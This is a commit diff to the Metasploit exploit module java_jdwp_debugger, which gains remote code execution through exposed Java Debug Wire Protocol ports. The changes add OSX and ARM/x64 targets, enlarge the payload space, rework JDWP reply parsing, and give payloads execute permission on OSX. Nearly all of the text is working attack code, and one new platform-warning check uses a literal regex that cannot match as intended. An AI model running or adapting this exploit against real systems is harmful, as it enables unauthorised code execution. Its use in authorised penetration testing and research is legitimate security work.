Land rapid7#8871, improve compatibility and speed of JDWP exploit

Brent Cook · Brent Cook · commit 821121d40b1d · 2017-08-23T18:53:47.000-05:00
diff --git a/modules/exploits/multi/misc/java_jdwp_debugger.rb b/modules/exploits/multi/misc/java_jdwp_debugger.rb
@@ -91,26 +91,19 @@ def initialize
           ['URL', 'https://svn.nmap.org/nmap/scripts/jdwp-exec.nse'],
           ['URL', 'http://blog.ioactive.com/2014/04/hacking-java-debug-wire-protocol-or-how.html']
         ],
-      'Platform'       => %w{ linux win },
-      'Arch'           => ARCH_X86,
+      'Platform'       => %w{ linux osx win },
+      'Arch'           => [ARCH_ARMLE, ARCH_AARCH64, ARCH_X86, ARCH_X64],
       'Payload'        =>
         {
-          'Space'        => 2048,
+          'Space'        => 10000000,
           'BadChars'    => '',
           'DisableNops' => true
         },
       'Targets'        =>
         [
-          [ 'Linux x86 (Native Payload)',
-            {
-                'Platform' => 'linux'
-            }
-          ],
-          [ 'Windows x86 (Native Payload)',
-            {
-              'Platform' => 'win'
-            }
-          ]
+          [ 'Linux (Native Payload)', { 'Platform' => 'linux' } ],
+          [ 'OSX (Native Payload)', { 'Platform' => 'osx' } ],
+          [ 'Windows (Native Payload)', { 'Platform' => 'win' } ]
         ],
       'DefaultTarget'  => 0,
       'License'        => MSF_LICENSE,
@@ -175,24 +168,18 @@ def read_reply(timeout = default_timeout)
     if pkt_len < 4
       fail_with(Failure::Unknown, "#{peer} - Received corrupted response")
     end
-    pkt_len = pkt_len - 4
+    id, flags, err_code = sock.get_once(7, timeout).unpack('NCn')
+    if err_code != 0 && flags == REPLY_PACKET_TYPE
+      fail_with(Failure::Unknown, "#{peer} - Server sent error with code #{err_code}")
+    end
 
-    response = sock.get_once(pkt_len, timeout)
-    fail_with(Failure::TimeoutExpired, "#{peer} - Not received response") unless response
-    while response.length < pkt_len
+    response = ""
+    while response.length + 11 < pkt_len
       partial = sock.get_once(pkt_len, timeout)
       fail_with(Failure::TimeoutExpired, "#{peer} - Not received response") unless partial
       response << partial
     end
-
-    fail_with(Failure::Unknown, "#{peer} - Received corrupted response") unless response.length == pkt_len
-
-    id, flags, err_code = response.unpack('NCn')
-    response.slice!(0..6)
-    if err_code != 0 && flags == REPLY_PACKET_TYPE
-      fail_with(Failure::Unknown, "#{peer} - Server sent error with code #{err_code}")
-    end
-
+    fail_with(Failure::Unknown, "#{peer} - Received corrupted response") unless response.length + 11 == pkt_len
     response
   end
 
@@ -207,8 +194,7 @@ def solve_string(data)
   # Unpacks received string structure from the server response into a normal string
   def read_string(data)
     data_len = data.unpack('N')[0]
-    data.slice!(0..3)
-    return data.slice!(0,data_len)
+    return data[4,data_len]
   end
 
   # Creates a new string object in the target VM and returns its id
@@ -252,10 +238,11 @@ def unformat(fmt, value)
   # Parses given data according to a set of formats
   def parse_entries(buf, formats, explicit=true)
     entries = []
+    index = 0
 
     if explicit
       nb_entries = buf.unpack('N')[0]
-      buf.slice!(0..3)
+      buf = buf[4..-1]
     else
       nb_entries = 1
     end
@@ -270,25 +257,25 @@ def parse_entries(buf, formats, explicit=true)
 
       formats.each do |fmt,name|
         if fmt == "L" || fmt == 8
-          data[name] = buf.unpack('Q>')[0]
-          buf.slice!(0..7)
+          data[name] = buf[index, 8].unpack('Q>')[0]
+          index += 8
         elsif fmt == "I" || fmt == 4
-          data[name] = buf.unpack('N')[0]
-          buf.slice!(0..3)
+          data[name] = buf[index, 4].unpack('N')[0]
+          index += 4
         elsif fmt == "S"
-          data_len = buf.unpack('N')[0]
-          buf.slice!(0..3)
-          data[name] = buf.slice!(0,data_len)
+          data_len = buf[index, 4].unpack('N')[0]
+          data[name] = buf[index + 4, data_len]
+          index += 4 + data_len
         elsif fmt == "C"
-          data[name] = buf.unpack('C')[0]
-          buf.slice!(0)
+          data[name] = buf[index].unpack('C')[0]
+          index += 1
         elsif fmt == "Z"
-          t = buf.unpack('C')[0]
-          buf.slice!(0)
+          t = buf[index].unpack('C')[0]
           if t == 115
-            data[name] = solve_string(buf.slice!(0..7))
+            data[name] = solve_string(buf[index + 1, 8])
+            index += 9
           elsif t == 73
-            data[name], buf = buf.unpack('NN')
+            data[name], buf = buf[index +1, 4].unpack('NN')
           end
         else
           fail_with(Failure::UnexpectedReply, "Unexpected data when parsing server response")
@@ -340,13 +327,13 @@ def get_all_threads
     sock.put(create_packet(ALLTHREADS_SIG))
     response = read_reply
     num_threads = response.unpack('N').first
-    response.slice!(0..3)
+    index = 4
 
     size = @vars["objectid_size"]
     num_threads.times do
-      t_id = unformat(size, response[0..size-1])
+      t_id = unformat(size, response[index, size])
       @threads[t_id] = nil
-      response.slice!(0..size-1)
+      index += size
     end
   end
 
@@ -429,10 +416,8 @@ def get_value(reftype_id, field_id)
       fail_with(Failure::Unknown, "Bad response when getting value for field")
     end
 
-    response.slice!(0..4)
-
     len = @vars["objectid_size"]
-    value = unformat(len, response)
+    value = unformat(len, response[5..-1])
 
     value
   end
@@ -688,15 +673,16 @@ def setup_payload
     when 'linux'
       path = temp_path || '/tmp/'
       payload_exe = "#{path}#{payload_exe}"
-      if @os.downcase =~ /win/
-        print_warning("#{@os} system detected but using Linux target...")
-      end
+    when 'osx'
+      path = temp_path || '/private/tmp/'
+      payload_exe = "#{path}#{payload_exe}"
     when 'win'
       path = temp_path || './'
       payload_exe = "#{path}#{payload_exe}.exe"
-      unless @os.downcase =~ /win/
-        print_warning("#{@os} system detected but using Windows target...")
-      end
+    end
+
+    if @os.downcase =~ /target['Platform']/
+      print_warning("#{@os} system detected but using #{target['Platform']} target...")
     end
 
     return payload_exe, pl_exe
@@ -900,7 +886,7 @@ def exec_payload(thread_id)
     close_file(thread_id, file)
 
     # 5b. When linux arch, give execution permissions to file
-    if target['Platform'] == 'linux'
+    if target['Platform'] == 'linux' || target['Platform'] == 'osx'
       cmd = "chmod +x #{payload_exe}"
       execute_command(thread_id, cmd)
     end
